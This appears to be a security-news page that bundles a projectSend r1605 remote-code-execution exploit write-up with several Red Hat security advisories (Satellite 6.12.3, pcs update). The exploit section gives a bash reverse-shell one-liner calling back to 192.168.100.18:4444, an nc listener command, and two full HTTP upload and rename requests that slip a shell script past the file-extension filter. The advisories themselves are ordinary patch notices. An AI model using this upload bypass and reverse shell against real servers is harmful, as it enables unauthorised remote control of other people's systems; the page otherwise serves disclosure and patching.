The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZC2Qe9zjgjWX9erEAQhVwA/9F+geRfR34ASgwJojn/TmhjS6mIrUdsy+  
JSeDC5XeDhtilIACCC/GYS2NUApiQiIsQAQ3rlXc1CeAJVLaPoZPtIaDieg7uq9X  
LU9O0RVRUt7gJQAjtRY1zPqS6ZMkMcEnPqF2gMxnlyVaCFFvv81FkRICZsT4BjcK  
5PlbFaUm2hroSR0L5bzQD0HvA6fKR0QkjFr+n5Uq4KLp+PB7cWhXatQYzhsswu7k  
ja7LZbiVeiCzgeWzXrWaDzTygLTRo2nFzeKuxwa6YfwGKaBrL8LN1HorqWr5XLCm  
001eTo1tTQCUhT8G1Sbw+BNZN20o+XdC6naJahAeq76p3vXhHXjbKutPqUgRDpgZ  
KiMu4Wi+pBTolH/MDrRDIeUpqDL9QON9b2sd3M3ZjfQI2GU84CUJJj/Z7Bs9BQzz  
JAskb1stqTom5S5oYX24uL9mKP+2d4WMEaPM1LWzlewKpIBJXryWHryN/LJggxOo  
bN09uK27ll+mTiBL9N+Spk4FlB5ZOOx9s3kcYWqv38sqRLlNNM/UKouDoR0pQd81  
IFKymxdIek5bM7qiySBQDpz4kOiw899KPxc+iC03FOqt8sYMHVz4O0jR97mn0DDO  
rxm6CwbM7/RpoqlNTprkufFsKR3sMZx5ryxIZBhwkejLi87wWkC0miqz8xeqUXkf  
CC9zM26e1Eg=  
=qd3R  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1659-01

projectSend r1605 suffers from a remote code execution vulnerability.

Exploit Title: projectSend r1605 - Remote Code Exectution RCE  
Application: projectSend  
Version: r1605  
Bugs:  rce via file extension manipulation  
Technology: PHP  
Vendor URL: https://www.projectsend.org/  
Software Link: https://www.projectsend.org/  
Date of found: 26-01-2023  
Author: Mirabbas Ağalarov  
Tested on: Linux   
POC video: https://youtu.be/Ln7KluDfnk4

2. Technical Details & POC  
========================================

1.The attacker first creates a txt file and pastes the following code. Next, the Attacker changes the file extension to jpg. Because the system php,sh,exe etc. It does not allow files. 

bash -i >& /dev/tcp/192.168.100.18/4444 0>&1

2.Then the attacker starts listening for ip and port   
 nc -lvp 4444

 3.and when uploading file it makes http request as below.file name should be like this      openme.sh;jpg

POST /includes/upload.process.php HTTP/1.1  
Host: localhost  
Content-Length: 525  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-platform: "Linux"  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0enbZuQQAtahFVjI  
Accept: */*  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/upload.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59  
Connection: close

------WebKitFormBoundary0enbZuQQAtahFVjI  
Content-Disposition: form-data; name="name"

openme.sh;jpg  
------WebKitFormBoundary0enbZuQQAtahFVjI  
Content-Disposition: form-data; name="chunk"

0  
------WebKitFormBoundary0enbZuQQAtahFVjI  
Content-Disposition: form-data; name="chunks"

1  
------WebKitFormBoundary0enbZuQQAtahFVjI  
Content-Disposition: form-data; name="file"; filename="blob"  
Content-Type: application/octet-stream

bash -i >& /dev/tcp/192.168.100.18/4444 0>&1

------WebKitFormBoundary0enbZuQQAtahFVjI--

4.In the second request, we do this to the filename section at the bottom.

openme.sh

POST /files-edit.php?ids=34 HTTP/1.1  
Host: localhost  
Content-Length: 1016  
Cache-Control: max-age=0  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc8btjvyb3An7HcmA  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/files-edit.php?ids=34&type=new  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59  
Connection: close

------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="csrf_token"

66540808a4bd64c0f0566e6c20a4bc36c49dfac41172788424c6924b15b18d02  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][id]"

34  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][original]"

openme.sh;.jpg  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][file]"

1674759035-52e51cf3f58377b8a687d49b960a58dfc677f0ad-openmesh.jpg  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][name]"

openme.sh  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][description]"

------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][expiry_date]"

25-02-2023  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="save"

------WebKitFormBoundaryc8btjvyb3An7HcmA--

And it doesn't matter who downloads your file. if it opens then reverse shell will be triggered and rce

private youtube video poc : https://youtu.be/Ln7KluDfnk4

projectSend r1605 Remote Code Execution

Red Hat Security Advisory 2023-1630-01 - Red Hat Satellite is a system management solution that allows organizations to configure and maintain their systems without the necessity to provide public Internet access to their servers or other client systems. Issues addressed include an information leakage vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Satellite 6.12.3 Async Security Update  
Advisory ID:       RHSA-2023:1630-01  
Product:           Red Hat Satellite 6  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1630  
Issue date:        2023-04-04  
CVE Names:         CVE-2022-41946   
=====================================================================

1. Summary:

Updated Satellite 6.12 packages that fixes important security bugs and  
several  
regular bugs are now available for Red Hat Satellite.

2. Relevant releases/architectures:

Red Hat Satellite 6.12 for RHEL 8 - noarch

3. Description:

Red Hat Satellite is a system management solution that allows organizations  
to configure and maintain their systems without the necessity to provide  
public Internet access to their servers or other client systems. It  
performs provisioning and configuration management of predefined standard  
operating environments.

Security fix(es):

* Candlepin: PreparedStatement.setText(int, InputStream) will create a  
temporary file if the InputStream is larger than 2k (CVE-2022-41946)

This update fixes the following bugs:

2163538 - Pages Blank  
2174984 - Getting 'null value in column \"image_manifest_id\" violates  
not-null constraint' when syncing openstack container repos  
2174987 - (Regression of 2033940) Error: AttributeError: 'NoneType' object  
has no attribute 'cast' thrown while listing repository versions  
2174994 - VMware Image based Provisioning fails with error- : Could not  
find virtual machine network interface matching <IP>  
2174997 - Package and Errata actions on content hosts selected using the  
"select all hosts" option fails.  
2174998 - Subscription can't be blank, A Pool and its Subscription cannot  
belong to different organizations  
2175002 - Getting "undefined method `schema_version' for nil:NilClass"  
while syncing from quay.io  
2175005 - New kickstart_kernel_options snippet breaks UEFI (Grub2) PXE  
provisioning when boot_mode is static  
2175008 - RHEL 9 as Guest OS is not available on Satellite 6.11   
2174995 - Health check should use hostname -f  
2175007 - [regression] data.yml is referring to old sync plain id which  
does not exist in katello_sync_plans  
2176272 - new wait task introduced by rh_cloud 6.0.44 is not recognized by  
maintain as OK to interrupt  
2175010 - Some custom repositories are failing to synchorize with error  
"This field may not be blank" after upgrading to Red Hat Satellite 6.11  
2176922 - [RFE] Need syncable yum-format repository imports   
2175003  - Can't perform incremental content exports in syncable format 

Users of Red Hat Satellite are advised to upgrade to these updated  
packages, which fix these bugs.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2153399 - CVE-2022-41946 postgresql-jdbc: Information leak of prepared statement data due to insecure temporary file permissions  
2163538 - Pages Blank  
2174984 - Getting 'null value in column \"image_manifest_id\" violates not-null constraint' when syncing openstack container repos  
2174987 - (Regression of 2033940) Error: AttributeError: 'NoneType' object has no attribute 'cast' thrown while listing repository versions  
2174994 - VMware Image based Provisioning fails with error- : Could not find virtual machine network interface matching <IP>  
2174995 - Health check should use hostname -f  
2174997 - Package and Errata actions on content hosts selected using the "select all hosts" option fails.  
2174998 - Subscription can't be blank, A Pool and its Subscription cannot belong to different organizations  
2175002 - Getting "undefined method `schema_version' for nil:NilClass" while syncing from quay.io  
2175003 - Can't perform incremental content exports in syncable format  
2175005 - New kickstart_kernel_options snippet breaks UEFI (Grub2) PXE provisioning when boot_mode is static  
2175007 - [regression] data.yml is referring to old sync plain id which does not exist in katello_sync_plans  
2175008 - RHEL 9 as Guest OS is not available on Satellite 6.11  
2175010 - Some custom repositories are failing to synchorize with error "This field may not be blank" after upgrading to Red Hat Satellite 6.11  
2176272 - new wait task introduced by rh_cloud 6.0.44 is not recognized by maintain as OK to interrupt  
2176922 - [RFE] Need syncable yum-format repository imports

6. Package List:

Red Hat Satellite 6.12 for RHEL 8:

Source:  
candlepin-4.1.20-1.el8sat.src.rpm  
foreman-3.3.0.21-2.el8sat.src.rpm  
python-django-3.2.16-1.el8pc.src.rpm  
python-pulp-container-2.10.12-1.el8pc.src.rpm  
python-pulpcore-3.18.16-1.el8pc.src.rpm  
rubygem-fog-vsphere-3.6.0-1.el8sat.src.rpm  
rubygem-foreman_maintain-1.1.12-1.el8sat.src.rpm  
rubygem-hammer_cli_katello-1.6.0.2-1.el8sat.src.rpm  
rubygem-katello-4.5.0.32-1.el8sat.src.rpm  
rubygem-optimist-3.0.1-1.el8sat.src.rpm  
rubygem-rbvmomi2-3.6.0-2.el8sat.src.rpm  
satellite-6.12.3-1.el8sat.src.rpm

noarch:  
candlepin-4.1.20-1.el8sat.noarch.rpm  
candlepin-selinux-4.1.20-1.el8sat.noarch.rpm  
foreman-3.3.0.21-2.el8sat.noarch.rpm  
foreman-cli-3.3.0.21-2.el8sat.noarch.rpm  
foreman-debug-3.3.0.21-2.el8sat.noarch.rpm  
foreman-dynflow-sidekiq-3.3.0.21-2.el8sat.noarch.rpm  
foreman-ec2-3.3.0.21-2.el8sat.noarch.rpm  
foreman-gce-3.3.0.21-2.el8sat.noarch.rpm  
foreman-journald-3.3.0.21-2.el8sat.noarch.rpm  
foreman-libvirt-3.3.0.21-2.el8sat.noarch.rpm  
foreman-openstack-3.3.0.21-2.el8sat.noarch.rpm  
foreman-ovirt-3.3.0.21-2.el8sat.noarch.rpm  
foreman-postgresql-3.3.0.21-2.el8sat.noarch.rpm  
foreman-service-3.3.0.21-2.el8sat.noarch.rpm  
foreman-telemetry-3.3.0.21-2.el8sat.noarch.rpm  
foreman-vmware-3.3.0.21-2.el8sat.noarch.rpm  
python39-django-3.2.16-1.el8pc.noarch.rpm  
python39-pulp-container-2.10.12-1.el8pc.noarch.rpm  
python39-pulpcore-3.18.16-1.el8pc.noarch.rpm  
rubygem-fog-vsphere-3.6.0-1.el8sat.noarch.rpm  
rubygem-foreman_maintain-1.1.12-1.el8sat.noarch.rpm  
rubygem-hammer_cli_katello-1.6.0.2-1.el8sat.noarch.rpm  
rubygem-katello-4.5.0.32-1.el8sat.noarch.rpm  
rubygem-optimist-3.0.1-1.el8sat.noarch.rpm  
rubygem-rbvmomi2-3.6.0-2.el8sat.noarch.rpm  
satellite-6.12.3-1.el8sat.noarch.rpm  
satellite-cli-6.12.3-1.el8sat.noarch.rpm  
satellite-common-6.12.3-1.el8sat.noarch.rpm

Red Hat Satellite 6.12 for RHEL 8:

Source:  
foreman-3.3.0.21-2.el8sat.src.rpm  
python-django-3.2.16-1.el8pc.src.rpm  
python-pulp-container-2.10.12-1.el8pc.src.rpm  
python-pulpcore-3.18.16-1.el8pc.src.rpm  
rubygem-foreman_maintain-1.1.12-1.el8sat.src.rpm  
satellite-6.12.3-1.el8sat.src.rpm

noarch:  
foreman-debug-3.3.0.21-2.el8sat.noarch.rpm  
python39-django-3.2.16-1.el8pc.noarch.rpm  
python39-pulp-container-2.10.12-1.el8pc.noarch.rpm  
python39-pulpcore-3.18.16-1.el8pc.noarch.rpm  
rubygem-foreman_maintain-1.1.12-1.el8sat.noarch.rpm  
satellite-capsule-6.12.3-1.el8sat.noarch.rpm  
satellite-common-6.12.3-1.el8sat.noarch.rpm

Red Hat Satellite 6.12 for RHEL 8:

Source:  
rubygem-foreman_maintain-1.1.12-1.el8sat.src.rpm

noarch:  
rubygem-foreman_maintain-1.1.12-1.el8sat.noarch.rpm

Red Hat Satellite 6.12 for RHEL 8:

Source:  
foreman-3.3.0.21-2.el8sat.src.rpm  
rubygem-hammer_cli_katello-1.6.0.2-1.el8sat.src.rpm  
satellite-6.12.3-1.el8sat.src.rpm

noarch:  
foreman-cli-3.3.0.21-2.el8sat.noarch.rpm  
rubygem-hammer_cli_katello-1.6.0.2-1.el8sat.noarch.rpm  
satellite-cli-6.12.3-1.el8sat.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-41946  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCyTXNzjgjWX9erEAQh57hAAknElDhu4y424D1I96zILtTXiJrw+50LC  
xD4Vj3M7gY44/6QgBg8H4YzfKZjdWGAX1byaDC6Wzb6RqtSnU7LCGI3PwA4+N3SY  
a0AidcKXV0LccwTDQcykzNC47KABGDShLFmXx5jGKn7LNWxrZRpSPk9G/jJ2tD4T  
/TaZQT20pxFXKs4vZvqXkjBDk0NXMT60fv128iXsloriajum1g3IcmJoB5R4tHFF  
bKp+sTWBVlOBwjN1qvXZ/A8JkvzKiyeMeVRM/sAoiFHNdaKFiUAsafebXTJJ55YC  
7zHqsAIO1MznhhHuW7xqE4cJb58HBYDA/Q7xD5NONFYJn+nMWe6wNgB7GOL2vNOR  
18wT35+BOjUnY0N1Ew9EllAeNOP2rHn9Rknvr9N3Z3WVzUU6Jsn4JyicdVi96xj7  
1G/Mwu2/I4fZE0SkLF3YUI1eB0akNa9lASZ/i29XbyL3HuYhDLkdQ2qrRrCWOHf3  
MxkYFoBaQlKLnWI21B1AkqIcxiqfQQ9CRECTTl86R3IZRnnV49IXrowSIAZJQy0r  
hY6n+5BcvGLpqDkyYelp4zaoCwnlSJRsXOJMBW5shF/9QfB1eWT7dU3bxnl+MPUO  
tZ0iUmZjbzBsjvgiQ22377jDuhdMk95lRgaRF8kdy13cavaykF5MA2hitfIiucL7  
pG8zVEKEY3A=  
=vuaR  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1630-01

Red Hat Security Advisory 2023-1591-01 - The pcs packages provide a command-line configuration system for the Pacemaker and Corosync utilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: pcs security update  
Advisory ID:       RHSA-2023:1591-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1591  
Issue date:        2023-04-04  
CVE Names:         CVE-2023-28154   
=====================================================================

1. Summary:

An update for pcs is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux High Availability (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Resilient Storage (v. 9) - ppc64le, s390x, x86_64

3. Description:

The pcs packages provide a command-line configuration system for the  
Pacemaker and Corosync utilities.

Security Fix(es):

* webpack: avoid cross-realm objects (CVE-2023-28154)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2179227 - CVE-2023-28154 webpack: avoid cross-realm objects

6. Package List:

Red Hat Enterprise Linux High Availability (v. 9):

Source:  
pcs-0.11.3-4.el9_1.3.src.rpm

aarch64:  
pcs-0.11.3-4.el9_1.3.aarch64.rpm  
pcs-snmp-0.11.3-4.el9_1.3.aarch64.rpm

ppc64le:  
pcs-0.11.3-4.el9_1.3.ppc64le.rpm  
pcs-snmp-0.11.3-4.el9_1.3.ppc64le.rpm

s390x:  
pcs-0.11.3-4.el9_1.3.s390x.rpm  
pcs-snmp-0.11.3-4.el9_1.3.s390x.rpm

x86_64:  
pcs-0.11.3-4.el9_1.3.x86_64.rpm  
pcs-snmp-0.11.3-4.el9_1.3.x86_64.rpm

Red Hat Enterprise Linux Resilient Storage (v. 9):

Source:  
pcs-0.11.3-4.el9_1.3.src.rpm

ppc64le:  
pcs-0.11.3-4.el9_1.3.ppc64le.rpm  
pcs-snmp-0.11.3-4.el9_1.3.ppc64le.rpm

s390x:  
pcs-0.11.3-4.el9_1.3.s390x.rpm  
pcs-snmp-0.11.3-4.el9_1.3.s390x.rpm

x86_64:  
pcs-0.11.3-4.el9_1.3.x86_64.rpm  
pcs-snmp-0.11.3-4.el9_1.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-28154  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCw/SNzjgjWX9erEAQgFiQ//cSTnnBTtcttxVs9yS2likrkJEbQMxdlk  
9P2vJJyx30d2I09mgAN7QU/8VVntlBJwBzGPBVn8UcIqSS2jHNNP22eQ4/3qAQqI  
pNDQoa+xvi8+M9sDWI4+/suFaLATvD5lZctbr7C4NgL2dMAnQh6vLdu7Noe61Z0/  
Oevb3WbH6VI8Gq+Xn5EVmLjYQCsFqi6rsQFFBWwlhpbDp+e4P8FE7QzYKfWQ62Ro  
u259cLje5O4L/iBVTsCNdC4i6ciTtelJvqQejfP22891EkuuKc52JteNk3olTZ9y  
yVDvEJwu4PrTwb7oEJ341XwoVvsl6QmGxUAVl9BBmf85umJkVx5hpsKKwIfpevEZ  
+ljH42KZMVzyTnW1vpxGd74PLa6TuOgiUHqf9jaVZ96xCUjY4z5ajfTqB0GJHG7K  
jg9LVy4OCX3aOma+Nqiv20t2OCCJ3WmfQfzAtUn91tWVzobl6XTB5Diu4GKZBBqi  
A2ROmiEtEVVafQ0XiiaisOLwYDzREXtKxjEHTTTTRejrNMi0TyeRcVN0Q/fNMTXm  
9jBw6nXi5uig7Ag+xAnFzDh2J5tEflKHt/EQ4NYCavSGyml1tQUFvsaRiJUn68Nw  
e+FI8SygXhZ6wdCSKB6REeTf92kaN8JtKmIeN65c/2Y5EG+jpc6R607H4zLbVP6o  
jYuOvRPIXvQ=  
=9+7P  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#linux